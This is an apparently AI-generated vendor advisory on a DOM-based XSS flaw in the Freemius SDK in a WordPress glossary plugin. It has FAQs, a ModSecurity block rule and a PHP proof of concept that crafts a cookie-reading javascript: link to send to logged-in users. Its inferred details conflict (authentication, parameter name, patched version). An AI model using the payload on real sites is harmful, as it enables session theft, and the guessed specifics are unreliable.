What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Freemius SDK library used by various WordPress plugins. It allows unauthenticated attackers to inject arbitrary scripts into web pages via a manipulated URL parameter.

Who is affected by this vulnerability?

WordPress sites using the Freemius SDK version 2.10.1 or earlier, specifically the glossary-by-codeat plugin version 2.2.38, are affected. Administrators should check their installed plugins for these versions to determine if they are vulnerable.

How does the vulnerability work?

The vulnerability occurs due to insufficient input sanitization of the URL parameter, allowing attackers to inject malicious scripts. When a user clicks a crafted link, the Freemius SDK processes the URL and executes the injected script in the user’s browser.

What are the practical risks of this vulnerability?

The CVSS score of 6.1 indicates a medium severity level, meaning that while the impact on confidentiality and integrity is low, successful exploitation can lead to session hijacking, phishing, or unauthorized actions on behalf of the victim.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Freemius SDK and the glossary-by-codeat plugin installed on your WordPress site. If they are version 2.10.1 or earlier, your site is potentially at risk.

What steps should I take to mitigate this issue?

To mitigate this vulnerability, update the glossary-by-codeat plugin to version 2.2.39 or later, which includes fixes for the issue. Additionally, ensure proper input sanitization and output escaping for any user-controlled data in your site’s code.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited under certain conditions, leading to potential unauthorized actions.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can craft a malicious link that exploits the vulnerability. It shows how the attacker can use a specific payload in the URL parameter to execute JavaScript in the victim’s browser when they click the link.

What is the recommended fix for this vulnerability?

The primary fix is to update the affected plugins to the latest versions that address the vulnerability. Additionally, implement proper sanitization techniques in your code to prevent similar vulnerabilities.

Can an attacker access server-side data through this vulnerability?

No, the attacker cannot directly access server-side data or execute commands on the server. However, they can perform actions in the context of the user’s session, which could include creating or modifying content if the user has sufficient privileges.

What are the signs of an exploitation attempt?

Signs of exploitation may include unusual user activity, such as unexpected redirects, unauthorized changes to user accounts, or reports from users about strange behavior on the site. Monitoring logs for unusual URL patterns can also help identify attempts.

Is this vulnerability specific to WordPress?

While this vulnerability is found in a WordPress plugin, the underlying issue of reflected DOM-based XSS can occur in any web application that fails to properly sanitize user input. However, this specific CVE is focused on the Freemius SDK used in WordPress.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (glossary-by-codeat)

CVE ID CVE-2024-13362

Plugin glossary-by-codeat

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.2.38

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a reflected DOM-based cross-site scripting (XSS) flaw found in the Freemius SDK library, which is bundled with many WordPress plugins and themes. The vulnerability affects versions up to 2.10.1 of Freemius and specifically version 2.2.38 of the glossary-by-codeat plugin. The CVSS score is 6.1 (Medium), reflecting low impact to confidentiality and integrity with no impact on availability.

The root cause, based on the CWE-79 classification and description, is insufficient input sanitization and output escaping of the url parameter. The Freemius SDK likely processes a url parameter in a JavaScript context, directly injecting user-supplied values into the DOM without proper escaping. Since no code diff is available, Atomic Edge research infers that the vulnerable code pattern involves reading a URL parameter and writing it into innerHTML, document.write, or similar DOM manipulation without sanitization. This is confirmed as a classic DOM-based XSS scenario.

Exploitation requires an authenticated user to click a crafted link. The attacker constructs a malicious URL containing the XSS payload in the url parameter. The Freemius SDK processes this parameter client-side and writes it into the page DOM, executing the injected script. The attack vector is typically a crafted link to a page on the target WordPress site that loads the vulnerable Freemius JavaScript, with the url parameter containing JavaScript code. For example: /?freemius_url=javascript:alert(1) or similar. The attacker must trick a user into clicking this link.

Remediation requires proper sanitization and escaping of the url parameter before it is used in any DOM manipulation. The fix should use encodeURIComponent() or a trusted DOM purification library when writing user-controlled data into the DOM. Server-side validation is also recommended, though the DOM-based nature means primary mitigation is at the client-side code. Patched version 2.2.39 of glossary-byate likely implements these measures.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim’s browser session on the vulnerable WordPress site. This can lead to session hijacking, phishing attacks, theft of authentication cookies, defacement, or redirection to malicious sites. The attacker cannot directly access server-side data or execute commands on the server, but can perform any action the victim can, including creating administrator accounts if the victim has elevated privileges.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks Reflected DOM XSS via Freemius 'url' parameter
# Targets any request where 'url' parameter contains javascript:, data:, vbscript:, or similar XSS schemes
SecRule ARGS:url "@rx ^(javascript|data|vbscript|file|about):" 
  "id:202613362,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius DOM XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule REQUEST_URI "@rx ^/|^/wp-admin|^/wp-content" 
    "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

/**
 * This PoC demonstrates how an attacker could craft a malicious link
 * and trick a user into triggering DOM-based XSS via the Freemius url parameter.
 * 
 * Assumptions:
 * - Target site uses a vulnerable Freemius version (<= 2.10.1).
 * - Vulnerable endpoint is on the target WordPress site (front-end or admin).
 * - Freemius SDK processes the 'url' GET parameter and writes it to DOM.
 * - No nonce or capability check is required for the XSS injection.
 */

// Configuration
$target_url = 'https://example.com'; // CHANGE THIS to target URL
$malicious_payload = 'javascript:alert(document.cookie)'; // XSS payload

// Craft the malicious URL
$attack_url = $target_url . '/?url=' . urlencode($malicious_payload);

echo "[+] Atomic Edge CVE Research PoCn";
echo "[+] CVE-2024-13362 - Freemius Reflected DOM XSSn";
echo "[+] Attack URL: " . $attack_url . "n";
echo "[*] Send this link to a logged-in user. When clicked, the JavaScript will execute in their browser.n";

// Optional: Test if the target page includes Freemius code
// This sends a GET request to the crafted URL and checks for reflection of the payload
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'AtomicEdge-PoC');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === false) {
    echo "[!] Error: Could not connect to target URL.n";
    exit(1);
}

echo "[+] HTTP Status: " . $http_code . "n";

// Check if payload appears in response (indicates potential server-side reflection, but DOM XSS may be client-side only)
if (strpos($response, $malicious_payload) !== false) {
    echo "[+] Payload reflected in page source.n";
} else {
    echo "[*] Payload not found in page source. DOM XSS may execute client-side without server-side reflection.n";
    echo "[*] Manual verification required: open the attack URL in a browser and check for JavaScript execution.n";
}
?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Freemius SDK library used by various WordPress plugins. It allows unauthenticated attackers to inject arbitrary scripts into web pages via a manipulated URL parameter.
Who is affected by this vulnerability?
Identifying vulnerable versions
WordPress sites using the Freemius SDK version 2.10.1 or earlier, specifically the glossary-by-codeat plugin version 2.2.38, are affected. Administrators should check their installed plugins for these versions to determine if they are vulnerable.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs due to insufficient input sanitization of the URL parameter, allowing attackers to inject malicious scripts. When a user clicks a crafted link, the Freemius SDK processes the URL and executes the injected script in the user’s browser.
What are the practical risks of this vulnerability?
Impact assessment
The CVSS score of 6.1 indicates a medium severity level, meaning that while the impact on confidentiality and integrity is low, successful exploitation can lead to session hijacking, phishing, or unauthorized actions on behalf of the victim.
How can I check if my site is vulnerable?
Verification process
To check for vulnerability, verify the version of the Freemius SDK and the glossary-by-codeat plugin installed on your WordPress site. If they are version 2.10.1 or earlier, your site is potentially at risk.
What steps should I take to mitigate this issue?
Recommended actions
To mitigate this vulnerability, update the glossary-by-codeat plugin to version 2.2.39 or later, which includes fixes for the issue. Additionally, ensure proper input sanitization and output escaping for any user-controlled data in your site’s code.
What does the CVSS score of 6.1 mean?
Severity classification
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited under certain conditions, leading to potential unauthorized actions.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept illustrates how an attacker can craft a malicious link that exploits the vulnerability. It shows how the attacker can use a specific payload in the URL parameter to execute JavaScript in the victim’s browser when they click the link.
What is the recommended fix for this vulnerability?
Updating and securing your site
The primary fix is to update the affected plugins to the latest versions that address the vulnerability. Additionally, implement proper sanitization techniques in your code to prevent similar vulnerabilities.
Can an attacker access server-side data through this vulnerability?
Limitations of the attack
No, the attacker cannot directly access server-side data or execute commands on the server. However, they can perform actions in the context of the user’s session, which could include creating or modifying content if the user has sufficient privileges.
What are the signs of an exploitation attempt?
Detecting potential attacks
Signs of exploitation may include unusual user activity, such as unexpected redirects, unauthorized changes to user accounts, or reports from users about strange behavior on the site. Monitoring logs for unusual URL patterns can also help identify attempts.
Is this vulnerability specific to WordPress?
Scope of the vulnerability
While this vulnerability is found in a WordPress plugin, the underlying issue of reflected DOM-based XSS can occur in any web application that fails to properly sanitize user input. However, this specific CVE is focused on the Freemius SDK used in WordPress.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations